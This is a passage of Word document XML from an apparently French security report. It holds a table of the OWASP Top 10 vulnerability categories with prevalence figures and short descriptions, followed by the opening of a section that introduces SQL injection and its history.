          <w:p w14:paraId="437997C9" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Prévalence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2AC0D043" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Description détaillée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="52327151" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="739475DB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="217A352B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Broken Access Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68566798" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>94 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55D11C2B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">Contrôle d'accès insuffisant — 3,81 M d'occurrences. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Première catégorie depuis 2021.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w:rsidRPr="007C23F1" w14:paraId="6B8830CF" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="74320624" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="3E228B7D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Cryptographic Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="4E4E105A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>70 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="23D633A6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Mauvais chiffrement ou absence de TLS — exposition de données sensibles en transit.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w:rsidRPr="007C23F1" w14:paraId="7F6876A7" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62C5564E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="478CD7C3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="013E1D20" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>94 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46EFFA77" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>SQLi, XSS, SSTI, commandes OS — entrées utilisateur interprétées comme commandes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w:rsidRPr="007C23F1" w14:paraId="02BB0E22" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="659CDEA6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>A04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="4E167B6B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="4F898E0A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>40 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="6B1AEB20" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Failles architecturales — absence de modélisation des menaces (Threat Modeling).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w:rsidRPr="007C23F1" w14:paraId="35A12E9D" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D19EA38" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="463B4535" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6ADACB15" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>90 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66ADD3BF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Configurations par défaut non sécurisées, headers manquants, services inutiles.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w:rsidRPr="007C23F1" w14:paraId="454F90BD" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="038609EA" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="4837176C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Vulnerable Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="048A53AB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>27 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="49B87AE5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Dépendances avec CVE connues — Log4Shell, Struts, Spring4Shell.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w:rsidRPr="007C23F1" w14:paraId="4C4351CE" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18706B91" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BDB6967" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Auth &amp; Session Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B675216" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>15 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65C4DC46" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Credentials par défaut, sessions sans expiration, absence de MFA.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w:rsidRPr="007C23F1" w14:paraId="78725B79" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="4DA626A6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="7A258DD6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Software &amp; Data Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="0DBF3B4A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="7C5232C3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Désérialisation non sécurisée, dépendances sans signature, CI/CD compromis.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w:rsidRPr="007C23F1" w14:paraId="7CB31351" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="562C1BE1" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7536685E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Logging &amp; Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="434ED1FD" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>19 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41DAA9DB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Journalisation insuffisante — retard de détection de 280 jours en moyenne.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w:rsidRPr="007C23F1" w14:paraId="53AAD6D3" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="7CF905AE" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>A10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="785BDCC4" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="77315571" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  8 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="3AA7D533" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Requêtes côté serveur vers ressources internes — cloud metadata, services privés.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5C003990" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="006A6D93">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FAD2C25"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1.4  Vulnérabilités Ciblées : Mécanismes et Impacts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01835153" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1.4.1  SQL Injection (SQLi) — OWASP A03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D39460" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>L'injection SQL est l'une des vulnérabilités les plus anciennes et les plus dangereuses. Elle survient lorsque des données utilisateur non validées sont incorporées directement dans des requêtes SQL, permettant à un attaquant de manipuler la logique de la base de données. La première description formelle date de 1998 (Jeff Forristal), et malgré 25 ans de sensibilisation, les injections SQL restent parmi les vecteurs d'attaque les plus fréquents, responsables de brèches majeures (Sony PlayStation Network 2011, Yahoo 2012, Ashley Madison 2015).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EFFBB2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
